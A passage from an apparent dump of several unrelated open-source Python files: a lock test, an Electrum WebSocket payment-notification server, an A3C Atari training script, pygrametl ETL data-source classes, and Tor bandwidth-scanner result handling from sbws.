self.lock_held.wait()
self.assertFalse(self.lock.acquire(blocking=False))
def test_message(self):
self.lock_process.start()
self.lock_held.wait()
self.assertTrue(os.path.exists(self.lock.message_path))
with open(self.lock.message_path, 'r') as f:
message_content = f.read()
self.assertIn(str(self.lock_process.pid), message_content)
os.unlink(self.lock.message_path)
def message_fn(message):
self.assertIn(self.lock.missing_message_output, message)
self.lock.acquire(blocking=False, message_fn=message_fn)
def test_blocking(self):
self.lock_process.start()
self.lock_held.wait()
self.assertFalse(self.lock.acquire(timeout=.1))
acquire_is_blocking = self.manager.Event()
def terminate_subproc(terminate, acquire_is_blocking):
acquire_is_blocking.wait()
terminate.set()
Thread(target=terminate_subproc, args=(self.terminate, acquire_is_blocking)).start()
def message_fn(message):
self.assertIn(str(self.lock_process.pid), message)
acquire_is_blocking.set()
# NOTE: We shouldn't ever wait this long (locally this runs in ~milliseconds)
# but sometimes CI containers are extremely slow, so we choose a very large
# value just in case.
self.assertTrue(self.lock.acquire(timeout=30, message_fn=message_fn))
def test_reentrant(self):
self.assertTrue(self.lock.acquire())
self.assertTrue(self.lock.acquire())
def test_release(self):
self.assertTrue(self.lock.acquire())
self.assertTrue(self.lock.acquired)
self.lock.release()
self.assertFalse(self.lock.acquired)
|
websockets.py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import queue
import threading, os, json
from collections import defaultdict
try:
from SimpleWebSocketServer import WebSocket, SimpleSSLWebSocketServer
except ImportError:
import sys
sys.exit("install SimpleWebSocketServer")
from . import util
from .address import Address
request_queue = queue.Queue()
class ElectrumWebSocket(WebSocket):
def handleMessage(self):
assert self.data[0:3] == 'id:'
util.print_error("message received", self.data)
request_id = self.data[3:]
request_queue.put((self, request_id))
def handleConnected(self):
util.print_error("connected", self.address)
def handleClose(self):
util.print_error("closed", self.address)
class WsClientThread(util.DaemonThread):
def __init__(self, config, network):
util.DaemonThread.__init__(self)
self.network = network
self.config = config
self.response_queue = queue.Queue()
self.subscriptions = defaultdict(list)
def make_request(self, request_id):
# read json file
rdir = self.config.get('requests_dir')
n = os.path.join(rdir, 'req', request_id[0], request_id[1], request_id, request_id + '.json')
with open(n, encoding='utf-8') as f:
s = f.read()
d = json.loads(s)
addr = d.get('address')
amount = d.get('amount')
return addr, amount
def reading_thread(self):
while self.is_running():
try:
ws, request_id = request_queue.get()
except queue.Empty:
continue
try:
addr, amount = self.make_request(request_id)
except:
continue
l = self.subscriptions.get(addr, [])
l.append((ws, amount))
self.subscriptions[addr] = l
h = Address.from_string(addr).to_scripthash_hex()
self.network.send([('blockchain.scripthash.subscribe', [h])], self.response_queue.put)
def run(self):
threading.Thread(target=self.reading_thread).start()
while self.is_running():
try:
r = self.response_queue.get(timeout=0.1)
except queue.Empty:
continue
util.print_error('response', r)
method = r.get('method')
params = r.get('params')
result = r.get('result')
if result is None:
continue
if method == 'blockchain.scripthash.subscribe':
self.network.send([('blockchain.scripthash.get_balance', params)], self.response_queue.put)
elif method == 'blockchain.scripthash.get_balance':
h = params[0]
addr = self.network.h2addr.get(h, None)
if addr is None:
util.print_error("can't find address for scripthash: %s" % h)
l = self.subscriptions.get(addr, [])
for ws, amount in l:
if not ws.closed:
if sum(result.values()) >=amount:
ws.sendMessage('paid')
class WebSocketServer(threading.Thread):
def __init__(self, config, ns):
threading.Thread.__init__(self)
self.config = config
self.net_server = ns
self.daemon = True
def run(self):
t = WsClientThread(self.config, self.net_server)
t.start()
host = self.config.get('websocket_server')
port = self.config.get('websocket_port', 9999)
certfile = self.config.get('ssl_chain')
keyfile = self.config.get('ssl_privkey')
self.server = SimpleSSLWebSocketServer(host, port, ElectrumWebSocket, certfile, keyfile)
self.server.serveforever()
|
main.py
|
from __future__ import print_function
import argparse
import os
import torch
import torch.multiprocessing as mp
import my_optim
from envs import create_atari_env
from model import ActorCritic
from test import test
from train import train
import time
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument('--lr', type=float, default=0.0001,
help='learning rate (default: 0.0001)')
parser.add_argument('--gamma', type=float, default=0.99,
help='discount factor for rewards (default: 0.99)')
parser.add_argument('--tau', type=float, default=1.00,
help='parameter for GAE (default: 1.00)')
parser.add_argument('--entropy-coef', type=float, default=0.01,
help='entropy term coefficient (default: 0.01)')
parser.add_argument('--value-loss-coef', type=float, default=0.5,
help='value loss coefficient (default: 0.5)')
parser.add_argument('--max-grad-norm', type=float, default=50,
help='value loss coefficient (default: 50)')
parser.add_argument('--seed', type=int, default=1,
help='random seed (default: 1)')
parser.add_argument('--num-processes', type=int, default=4,
help='how many training processes to use (default: 4)')
parser.add_argument('--num-steps', type=int, default=20,
help='number of forward steps in A3C (default: 20)')
parser.add_argument('--max-episode-length', type=int, default=1000000,
help='maximum length of an episode (default: 1000000)')
parser.add_argument('--env-name', default='PongDeterministic-v4',
help='environment to train on (default: PongDeterministic-v4)')
parser.add_argument('--no-shared', default=False,
help='use an optimizer without shared momentum.')
if __name__ == '__main__':
mp.set_start_method('spawn')
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['CUDA_VISIBLE_DEVICES'] = ""
args = parser.parse_args()
torch.manual_seed(args.seed)
env = create_atari_env(args.env_name)
shared_model = ActorCritic(env.observation_space.shape[0], env.action_space)
shared_model.share_memory()
if args.no_shared:
optimizer = None
else:
optimizer = my_optim.SharedAdam(shared_model.parameters(), lr=args.lr)
optimizer.share_memory()
processes = []
counter = mp.Value('i', 0)
lock = mp.Lock()
p = mp.Process(target=test, args=(args.num_processes, args, shared_model, counter))
p.start()
processes.append(p)
for rank in range(0, args.num_processes):
p = mp.Process(target=train, args=(rank, args, shared_model, counter, lock, optimizer, False))
p.start()
processes.append(p)
time.sleep(5)
for p in processes:
p.join()
|
datasources.py
|
"""This module holds classes that can be used as data soures. Note that it is
easy to create other data sources: A data source must be iterable and
provide dicts that map from attribute names to attribute values.
"""
# Copyright (c) 2009-2020, Aalborg University (pygrametl@cs.aau.dk)
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from csv import DictReader
import sys
if sys.platform.startswith('java'):
# Jython specific code
from pygrametl.jythonmultiprocessing import Queue, Process
else:
from multiprocessing import Queue, Process
try:
from Queue import Empty # Python 2
except ImportError:
from queue import Empty # Python 3
__all__ = ['CSVSource', 'TypedCSVSource', 'SQLSource', 'PandasSource',
'JoiningSource', 'HashJoiningSource', 'MergeJoiningSource',
'BackgroundSource', 'ProcessSource', 'MappingSource',
'TransformingSource', 'UnionSource', 'CrossTabbingSource',
'FilteringSource', 'DynamicForEachSource', 'RoundRobinSource']
CSVSource = DictReader
class TypedCSVSource(DictReader):
"""A class for iterating a CSV file and type cast the values."""
def __init__(self, f, casts, fieldnames=None, restkey=None,
restval=None, dialect='excel', *args, **kwds):
"""Arguments:
- f: An iterable object such as as file. Passed on to
csv.DictReader
- casts: A dict mapping from attribute names to functions to apply
to these names, e.g., {'id':int, 'salary':float}
- fieldnames: Passed on to csv.DictReader
- restkey: Passed on to csv.DictReader
- restval: Passed on to csv.DictReader
- dialect: Passed on to csv.DictReader
- *args: Passed on to csv.DictReader
- **kwds: Passed on to csv.DictReader
"""
DictReader.__init__(self, f, fieldnames=fieldnames,
restkey=restkey, restval=restval, dialect=dialect,
*args, **kwds)
if not type(casts) == dict:
raise TypeError("The casts argument must be a dict")
for v in casts.values():
if not callable(v):
raise TypeError("The values in casts must be callable")
self._casts = casts
def __next__(self): # For Python 3
row = DictReader.__next__(self)
for (att, func) in self._casts.items():
row[att] = func(row[att])
return row
def next(self): # For Python 2
row = DictReader.next(self)
for (att, func) in self._casts.items():
row[att] = func(row[att])
return row
class SQLSource(object):
"""A class for iterating the result set of a single SQL query."""
def __init__(self, connection, query, names=(), initsql=None,
cursorarg=None, parameters=None):
"""Arguments:
- connection: the PEP 249 connection to use. NOT a
ConnectionWrapper!
- query: the query that generates the result
- names: names of attributes in the result. If not set,
the names from the database are used. Default: ()
- initsql: SQL that is executed before the query. The result of this
initsql is not returned. Default: None.
- cursorarg: if not None, this argument is used as an argument when
the connection's cursor method is called. Default: None.
- parameters: if not None, this sequence or mapping of parameters
will be sent when the query is executed.
"""
self.connection = connection
if cursorarg is not None:
self.cursor = connection.cursor(cursorarg)
else:
self.cursor = connection.cursor()
if initsql:
self.cursor.execute(initsql)
self.query = query
self.names = names
self.executed = False
self.parameters = parameters
def __iter__(self):
try:
if not self.executed:
if self.parameters:
self.cursor.execute(self.query, self.parameters)
else:
self.cursor.execute(self.query)
names = None
if self.names or self.cursor.description:
names = self.names or \
[t[0] for t in self.cursor.description]
while True:
data = self.cursor.fetchmany(500)
if not data:
break
if not names:
# We do this to support cursor objects that only have
# a meaningful .description after data has been fetched.
# This is, for example, the case when using a named
# psycopg2 cursor.
names = [t[0] for t in self.cursor.description]
if len(names) != len(data[0]):
raise ValueError(
"Incorrect number of names provided. " +
"%d given, %d needed." % (len(names), len(data[0])))
for row in data:
yield dict(zip(names, row))
finally:
try:
self.cursor.close()
except Exception:
pass
class PandasSource(object):
"""A source for iterating a Pandas DataFrame and cast each row to a dict."""
def __init__(self, dataFrame):
"""Arguments:
- dataFrame: A Pandas DataFrame
"""
self._dataFrame = dataFrame
def __iter__(self):
for (_, series) in self._dataFrame.iterrows():
row = series.to_dict()
yield row
class ProcessSource(object):
"""A class for iterating another source in a separate process"""
def __init__(self, source, batchsize=500, queuesize=20):
"""Arguments:
- source: the source to iterate
- batchsize: the number of rows passed from the worker process each
time it passes on a batch of rows. Must be positive. Default: 500
- queuesize: the maximum number of batches that can wait in a queue
between the processes. 0 means unlimited. Default: 20
"""
if not isinstance(batchsize, int) or batchsize < 1:
raise ValueError('batchsize must be a positive integer')
self.__source = source
self.__batchsize = batchsize
self.__queue = Queue(queuesize)
p = Process(target=self.__worker)
p.name = "Process for ProcessSource"
p.start()
def __worker(self):
batch = []
try:
for row in self.__source:
batch.append(row)
if len(batch) == self.__batchsize:
self.__queue.put(batch)
batch = []
# We're done. Send the batch if it has any data and a signal
if batch:
self.__queue.put(batch)
self.__queue.put('STOP')
except Exception:
# Jython 2.5.X does not support the as syntax required by Python 3
e = sys.exc_info()[1]
if batch:
self.__queue.put(batch)
self.__queue.put('EXCEPTION')
self.__queue.put(e)
def __iter__(self):
while True:
data = self.__queue.get()
if data == 'STOP':
break
elif data == 'EXCEPTION':
exc = self.__queue.get()
raise exc
# else we got a list of rows from the other process
for row in data:
yield row
BackgroundSource = ProcessSource # for compatability
# The old thread-based BackgroundSource has been removed and
# replaced by ProcessSource
class HashJoiningSource(object):
"""A class for equi-joining two data sources."""
def __init__(self, src1, key1, src2, key2):
"""Arguments:
- src1: the first source. This source is iterated row by row.
- key1: the attribute of the first source to use in the join
- src2: the second source. The rows of this source are all loaded
into memory.
- key2: the attriubte of the second source to use in the join.
"""
self.__hash = {}
self.__src1 = src1
self.__key1 = key1
self.__src2 = src2
self.__key2 = key2
def __buildhash(self):
for row in self.__src2:
keyval = row[self.__key2]
l = self.__hash.get(keyval, [])
l.append(row)
self.__hash[keyval] = l
self.__ready = True
def __iter__(self):
self.__buildhash()
for row in self.__src1:
matches = self.__hash.get(row[self.__key1], [])
for match in matches:
newrow = row.copy()
newrow.update(match)
yield newrow
JoiningSource = HashJoiningSource # for compatability
class MergeJoiningSource(object):
"""A class for merge-joining two sorted data sources"""
def __init__(self, src1, key1, src2, key2):
"""Arguments:
- src1: a data source
- key1: the attribute to use from src1
- src2: a data source
- key2: the attribute to use from src2
"""
self.__src1 = src1
self.__key1 = key1
self.__src2 = src2
self.__key2 = key2
self.__next = None
def __iter__(self):
iter1 = self.__src1.__iter__()
iter2 = self.__src2.__iter__()
row1 = next(iter1)
keyval1 = row1[self.__key1]
rows2 = self.__getnextrows(iter2)
keyval2 = rows2[0][self.__key2]
try:
while True: # At one point there will be a StopIteration
if keyval1 == keyval2:
# Output rows
for part in rows2:
resrow = row1.copy()
resrow.update(part)
yield resrow
row1 = next(iter1)
keyval1 = row1[self.__key1]
elif keyval1 < keyval2:
row1 = next(iter1)
keyval1 = row1[self.__key1]
else: # k1 > k2
rows2 = self.__getnextrows(iter2)
keyval2 = rows2[0][self.__key2]
except StopIteration:
return # Needed in Python 3.7+ due to PEP 479
def __getnextrows(self, iterval):
res = []
keyval = None
if self.__next is not None:
res.append(self.__next)
keyval = self.__next[self.__key2]
self.__next = None
while True:
try:
row = next(iterval)
except StopIteration:
if res:
return res
else:
raise
if keyval is None:
keyval = row[self.__key2] # for the first row in this round
if row[self.__key2] == keyval:
res.append(row)
else:
self.__next = row
return res
class MappingSource(object):
"""A class for iterating a source and applying a function to each column."""
def __init__(self, source, callables):
"""Arguments:
- source: A data source
- callables: A dict mapping from attribute names to functions to
apply to these names, e.g. type casting {'id':int, 'salary':float}
"""
if not type(callables) == dict:
raise TypeError("The callables argument must be a dict")
for v in callables.values():
if not callable(v):
raise TypeError("The values in callables must be callable")
self._source = source
self._callables = callables
def __iter__(self):
for row in self._source:
for (att, func) in self._callables.items():
row[att] = func(row[att])
yield row
class TransformingSource(object):
"""A source that applies functions to the rows from another source"""
def __init__(self, source, *transformations):
"""Arguments:
- source: a data source
- *transformations: the transformations to apply. Must be callables
of the form func(row) where row is a dict. Will be applied in the
given order.
"""
self.__source = source
self.__transformations = transformations
def __iter__(self):
for row in self.__source:
for func in self.__transformations:
func(row)
yield row
class CrossTabbingSource(object):
"""A source that produces a crosstab from another source"""
def __init__(self, source, rowvaluesatt, colvaluesatt, values,
aggregator=None, nonevalue=0, sortrows=False):
"""Arguments:
- source: the data source to pull data from
- rowvaluesatt: the name of the attribute that holds the values that
appear as rows in the result
- colvaluesatt: the name of the attribute that holds the values that
appear as columns in the result
- values: the name of the attribute that holds the values to aggregate
- aggregator: the aggregator to use (see pygrametl.aggregators). If not
given, pygrametl.aggregators.Sum is used to sum the values
- nonevalue: the value to return when there is no data to aggregate.
Default: 0
- sortrows: A boolean deciding if the rows should be sorted.
Default: False
"""
self.__source = source
self.__rowvaluesatt = rowvaluesatt
self.__colvaluesatt = colvaluesatt
self.__values = values
if aggregator is None:
from pygrametl.aggregators import Sum
self.__aggregator = Sum()
else:
self.__aggregator = aggregator
self.__nonevalue = nonevalue
self.__sortrows = sortrows
self.__allcolumns = set()
self.__allrows = set()
def __iter__(self):
for data in self.__source: # first we iterate over all source data ...
row = data[self.__rowvaluesatt]
col = data[self.__colvaluesatt]
self.__allrows.add(row)
self.__allcolumns.add(col)
self.__aggregator.process((row, col), data[self.__values])
# ... and then we build result rows
for row in (self.__sortrows and sorted(self.__allrows) or
self.__allrows):
res = {self.__rowvaluesatt: row}
for col in self.__allcolumns:
res[col] = \
self.__aggregator.finish((row, col), self.__nonevalue)
yield res
class FilteringSource(object):
"""A source that applies a filter to another source"""
def __init__(self, source, filter=bool):
"""Arguments:
- source: the source to filter
- filter: a callable f(row). If the result is a True value,
the row is passed on. If not, the row is discarded.
Default: bool, i.e., Python's standard boolean conversion which
removes empty rows.
"""
self.__source = source
self.__filter = filter
def __iter__(self):
for row in self.__source:
if self.__filter(row):
yield row
class UnionSource(object):
"""A source to union other sources (possibly with different types of rows).
All rows are read from the 1st source before rows are read from the 2nd
source and so on (to interleave the rows, use a RoundRobinSource)
"""
def __init__(self, *sources):
"""Arguments:
- *sources: The sources to union in the order they should be used.
"""
self.__sources = sources
def __iter__(self):
for src in self.__sources:
for row in src:
yield row
class RoundRobinSource(object):
"""A source that reads sets of rows from sources in round robin-fashion"""
def __init__(self, sources, batchsize=500):
"""Arguments:
- sources: a sequence of data sources
- batchsize: the amount of rows to read from a data source before
going to the next data source. Must be positive (to empty a source
before going to the next, use UnionSource)
"""
self.__sources = [iter(src) for src in sources]
self.__sources.reverse() # we iterate it from the back in __iter__
if not batchsize > 0:
raise ValueError("batchsize must be positive")
self.__batchsize = batchsize
def __iter__(self):
while self.__sources:
# iterate from back
for i in range(len(self.__sources) - 1, -1, -1):
cursrc = self.__sources[i]
# now return up to __batchsize from cursrc
try:
for _ in range(self.__batchsize):
yield next(cursrc)
except StopIteration:
# we're done with this source and can delete it since
# we iterate the list as we do
del self.__sources[i]
return
class DynamicForEachSource(object):
"""A source that for each given argument creates a new source that
will be iterated by this source.
For example, useful for directories where a CSVSource should be created
for each file.
The user must provide a function that when called with a single argument,
returns a new source to iterate. A DynamicForEachSource instance can be
given to several ProcessSource instances.
"""
def __init__(self, seq, callee):
"""Arguments:
- seq: a sequence with the elements for each of which a unique
source must be created. the elements are given (one by one) to
callee.
- callee: a function f(e) that must accept elements as those in the
seq argument. the function should return a source which then will
be iterated by this source. the function is called once for every
element in seq.
"""
self.__queue = Queue() # a multiprocessing.Queue
if not callable(callee):
raise TypeError('callee must be callable')
self.__callee = callee
for e in seq:
# put them in a safe queue such that this object can be used from
# different fork'ed processes
self.__queue.put(e)
def __iter__(self):
while True:
try:
arg = self.__queue.get(False)
src = self.__callee(arg)
for row in src:
yield row
except Empty:
return
|
resultdump.py
|
import os
import json
import time
import logging
from glob import glob
from threading import Thread
from threading import RLock
from queue import Queue
from queue import Empty
from datetime import datetime
from datetime import timedelta
from enum import Enum
from sbws.globals import RESULT_VERSION, fail_hard
from sbws.util.filelock import DirectoryLock
from sbws.lib.relaylist import Relay
from .. import settings
log = logging.getLogger(__name__)
def merge_result_dicts(d1, d2):
'''
Given two dictionaries that contain Result data, merge them. Result
dictionaries have keys of relay fingerprints and values of lists of results
for those relays.
'''
for key in d2:
if key not in d1:
d1[key] = []
d1[key].extend(d2[key])
return d1
def load_result_file(fname, success_only=False):
''' Reads in all lines from the given file, and parses them into Result
structures (or subclasses of Result). Optionally only keeps ResultSuccess.
Returns all kept Results as a result dictionary. This function does not
care about the age of the results '''
assert os.path.isfile(fname)
d = {}
num_total = 0
num_ignored = 0
with DirectoryLock(os.path.dirname(fname)):
with open(fname, 'rt') as fd:
for line in fd:
num_total += 1
try:
r = Result.from_dict(json.loads(line.strip()))
except json.decoder.JSONDecodeError:
log.warning('Could not decode result %s', line.strip())
r = None
if r is None:
num_ignored += 1
continue
if success_only and isinstance(r, ResultError):
continue
fp = r.fingerprint
if fp not in d:
d[fp] = []
d[fp].append(r)
num_kept = sum([len(d[fp]) for fp in d])
log.debug('Keeping %d/%d read lines from %s', num_kept, num_total, fname)
if num_ignored > 0:
log.warning('Had to ignore %d results due to not knowing how to '
'parse them.', num_ignored)
return d
def trim_results(fresh_days, result_dict):
''' Given a result dictionary, remove all Results that are no longer valid
and return the new dictionary '''
assert isinstance(fresh_days, int)
assert isinstance(result_dict, dict)
data_period = fresh_days * 24*60*60
oldest_allowed = time.time() - data_period
out_results = {}
for fp in result_dict:
for result in result_dict[fp]:
if result.time >= oldest_allowed:
if fp not in out_results:
out_results[fp] = []
out_results[fp].append(result)
num_in = sum([len(result_dict[fp]) for fp in result_dict])
num_out = sum([len(out_results[fp]) for fp in out_results])
log.debug('Keeping %d/%d results after removing old ones', num_out, num_in)
return out_results
def trim_results_ip_changed(result_dict, on_changed_ipv4=False,
on_changed_ipv6=False):
"""When there are results for the same relay with different IPs,
create a new results' dictionary without that relay's results using an
older IP.
:param dict result_dict: a dictionary of results
:param bool on_changed_ipv4: whether to trim the results when a relay's
IPv4 changes
:param bool on_changed_ipv6: whether to trim the results when a relay's
IPv6 changes
:returns: a new results dictionary
"""
assert isinstance(result_dict, dict)
new_results_dict = {}
if on_changed_ipv4 is True:
for fp in result_dict.keys():
results = result_dict[fp]
# find if the results for a relay have more than one ipv4
# address
ipv4s = set([result.address for result in results])
if len(ipv4s) > 1:
# keep only the results for the last ip used
# probably we should not just discard all the results for
# a relay that change address
ordered_results = sorted(results, key=lambda r: r.time)
latest_address = ordered_results[-1].address
last_ip_results = [result for result in results
if result.address == latest_address]
new_results_dict[fp] = last_ip_results
else:
new_results_dict[fp] = results
return new_results_dict
if on_changed_ipv6 is True:
log.warning("Reseting bandwidth results when IPv6 changes,"
" is not yet implemented.")
return result_dict
def load_recent_results_in_datadir(fresh_days, datadir, success_only=False,
on_changed_ipv4=False,
on_changed_ipv6=False):
''' Given a data directory, read all results files in it that could have
results in them that are still valid. Trim them, and return the valid
Results as a list '''
assert isinstance(fresh_days, int)
assert os.path.isdir(datadir)
# Inform the results are being loaded, since it takes some seconds.
log.info("Reading and processing previous measurements.")
results = {}
today = datetime.utcfromtimestamp(time.time())
data_period = fresh_days + 2
oldest_day = today - timedelta(days=data_period)
working_day = oldest_day
while working_day <= today:
# Cannot use ** and recursive=True in glob() because we support 3.4
# So instead settle on finding files in the datadir and one
# subdirectory below the datadir that fit the form of YYYY-MM-DD*.txt
d = working_day.date()
patterns = [os.path.join(datadir, '{}*.txt'.format(d)),
os.path.join(datadir, '*', '{}*.txt'.format(d))]
for pattern in patterns:
for fname in glob(pattern):
new_results = load_result_file(
fname, success_only=success_only)
results = merge_result_dicts(results, new_results)
working_day += timedelta(days=1)
results = trim_results(fresh_days, results)
# in time fresh days is possible that a relay changed ip,
# if that's the case, keep only the results for the last ip
results = trim_results_ip_changed(results, on_changed_ipv4,
on_changed_ipv6)
num_res = sum([len(results[fp]) for fp in results])
if num_res == 0:
log.warning('Results files that are valid not found. '
'Probably sbws scanner was not run first or '
'it ran more than %d days ago or '
'it was using a different datadir than %s.', data_period,
datadir)
return results
def write_result_to_datadir(result, datadir):
''' Can be called from any thread '''
assert isinstance(result, Result)
assert os.path.isdir(datadir)
dt = datetime.utcfromtimestamp(result.time)
ext = '.txt'
result_fname = os.path.join(
datadir, '{}{}'.format(dt.date(), ext))
with DirectoryLock(datadir):
log.debug('Writing a result to %s', result_fname)
with open(result_fname, 'at') as fd:
fd.write('{}\n'.format(str(result)))
class _StrEnum(str, Enum):
pass
class _ResultType(_StrEnum):
Success = 'success'
Error = 'error-misc'
ErrorCircuit = 'error-circ'
ErrorStream = 'error-stream'
ErrorAuth = 'error-auth'
# When it can not be found a second relay suitable to measure a relay.
# It is used in ``ResultErrorSecondRelay``.
ErrorSecondRelay = 'error-second-relay'
# When there is not a working destination Web Server.
# It is used in ``ResultErrorDestionation``.
ErrorDestination = 'error-destination'
class Result:
"""A bandwidth measurement for a relay.
It re-implements :class:`~sbws.lib.relaylist.Relay` as a inner class.
"""
class Relay:
"""A Tor relay.
It re-implements :class:`~sbws.lib.relaylist.Relay`
with the attributes needed.
.. note:: in a future refactor it would be simpler if a ``Relay`` has
measurements and a measurement has a relay,
instead of every measurement re-implementing ``Relay``.
"""
def __init__(self, fingerprint, nickname, address, master_key_ed25519,
average_bandwidth=None, burst_bandwidth=None,
observed_bandwidth=None, consensus_bandwidth=None,
consensus_bandwidth_is_unmeasured=None,
# Counters to be stored by relay and not per measurement,
# since the measurements might fail.
relay_in_recent_consensus_count=None,
relay_recent_measurement_attempt_count=None,
relay_recent_priority_list_count=None):
"""
Initializes a ``Result.Relay``.
.. note:: in a future refactor the attributes should be dinamic
to easy adding/removing them.
They are shared by :class:`~sbws.lib.relaylist.Relay` and
:class:`~sbws.lib.v3bwfile.V3BWLine` and there should not be
repeated in every class.
"""
self.fingerprint = fingerprint
self.nickname = nickname
self.address = address
self.master_key_ed25519 = master_key_ed25519
self.average_bandwidth = average_bandwidth
self.burst_bandwidth = burst_bandwidth
self.observed_bandwidth = observed_bandwidth
self.consensus_bandwidth = consensus_bandwidth
self.consensus_bandwidth_is_unmeasured = \
consensus_bandwidth_is_unmeasured
self.relay_in_recent_consensus_count = \
relay_in_recent_consensus_count
self.relay_recent_measurement_attempt_count = \
relay_recent_measurement_attempt_count
self.relay_recent_priority_list_count = \
relay_recent_priority_list_count
def __init__(self, relay, circ, dest_url, scanner_nick, t=None,
relay_in_recent_consensus_count=None):
"""
Initilizes the measurement and the relay with all the relay attributes.
"""
self._relay = Result.Relay(
relay.fingerprint, relay.nickname,
relay.address, relay.master_key_ed25519,
relay.average_bandwidth,
relay.burst_bandwidth,
relay.observed_bandwidth,
relay.consensus_bandwidth,
relay.consensus_bandwidth_is_unmeasured,
relay.relay_in_recent_consensus_count,
relay.relay_recent_measurement_attempt_count,
relay.relay_recent_priority_list_count
)
self._circ = circ
self._dest_url = dest_url
self._scanner = scanner_nick
self._time = time.time() if t is None else t
@property
def type(self):
raise NotImplementedError()
@property
def relay_average_bandwidth(self):
return self._relay.average_bandwidth
@property
def relay_burst_bandwidth(self):
return self._relay.burst_bandwidth
@property
def relay_observed_bandwidth(self):
return self._relay.observed_bandwidth
@property
def consensus_bandwidth(self):
return self._relay.consensus_bandwidth
@property
def consensus_bandwidth_is_unmeasured(self):
return self._relay.consensus_bandwidth_is_unmeasured
@property
def fingerprint(self):
return self._relay.fingerprint
@property
def nickname(self):
return self._relay.nickname
@property
def address(self):
return self._relay.address
@property
def master_key_ed25519(self):
return self._relay.master_key_ed25519
@property
def relay_in_recent_consensus_count(self):
"""Number of times the relay was in a consensus."""
return self._relay.relay_in_recent_consensus_count
@property
def relay_recent_measurement_attempt_count(self):
"""Returns the relay recent measurements attemps.
It is initialized in :class:`~sbws.lib.relaylist.Relay` and
incremented in :func:`~sbws.core.scanner.main_loop`.
"""
return self._relay.relay_recent_measurement_attempt_count
@property
def relay_recent_priority_list_count(self):
"""Returns the relay recent "prioritization"s to be measured.
It is initialized in :class:`~sbws.lib.relaylist.Relay` and
incremented in :func:`~sbws.core.scanner.main_loop`.
"""
return self._relay.relay_recent_priority_list_count
@property
def circ(self):
return self._circ
@property
def dest_url(self):
return self._dest_url
@property
def scanner(self):
return self._scanner
@property
def time(self):
return self._time
@property
def version(self):
return RESULT_VERSION
def to_dict(self):
return {
'fingerprint': self.fingerprint,
'nickname': self.nickname,
'address': self.address,
'master_key_ed25519': self.master_key_ed25519,
'circ': self.circ,
'dest_url': self.dest_url,
'time': self.time,
'type': self.type,
'scanner': self.scanner,
'version': self.version,
'relay_in_recent_consensus_count':
self.relay_in_recent_consensus_count,
'relay_recent_measurement_attempt_count':
self.relay_recent_measurement_attempt_count,
'relay_recent_priority_list_count':
self.relay_recent_priority_list_count,
}
@staticmethod
def from_dict(d):
"""
Returns a :class:`~sbws.lib.resultdump.Result` subclass from a
dictionary.
Returns None if the ``version`` attribute is not
:const:`~sbws.globals.RESULT_VERSION`
It raises ``NotImplementedError`` when the dictionary ``type`` can not
be parsed.
.. note:: in a future refactor, the conversions to/from
object-dictionary will be simpler using ``setattr`` and ``__dict__``
``version`` is not being used and should be removed.
"""
assert 'version' in d
if d['version'] != RESULT_VERSION:
return None
assert 'type' in d
if d['type'] == _ResultType.Success.value:
return ResultSuccess.from_dict(d)
elif d['type'] == _ResultType.Error.value:
return ResultError.from_dict(d)
elif d['type'] == _ResultType.ErrorCircuit.value:
return ResultErrorCircuit.from_dict(d)
elif d['type'] == _ResultType.ErrorStream.value:
return ResultErrorStream.from_dict(d)
elif d['type'] == _ResultType.ErrorAuth.value:
return ResultErrorAuth.from_dict(d)
elif d['type'] == _ResultType.ErrorSecondRelay.value:
return ResultErrorSecondRelay.from_dict(d)
elif d['type'] == _ResultType.ErrorDestination.value:
return ResultErrorDestination.from_dict(d)
else:
raise NotImplementedError(
'Unknown result type {}'.format(d['type']))
def __str__(self):
return json.dumps(self.to_dict())
class ResultError(Result):
def __init__(self, *a, msg=None, **kw):
super().__init__(*a, **kw)
self._msg = msg
@property
def type(self):
return _ResultType.Error
@property
def freshness_reduction_factor(self):
'''
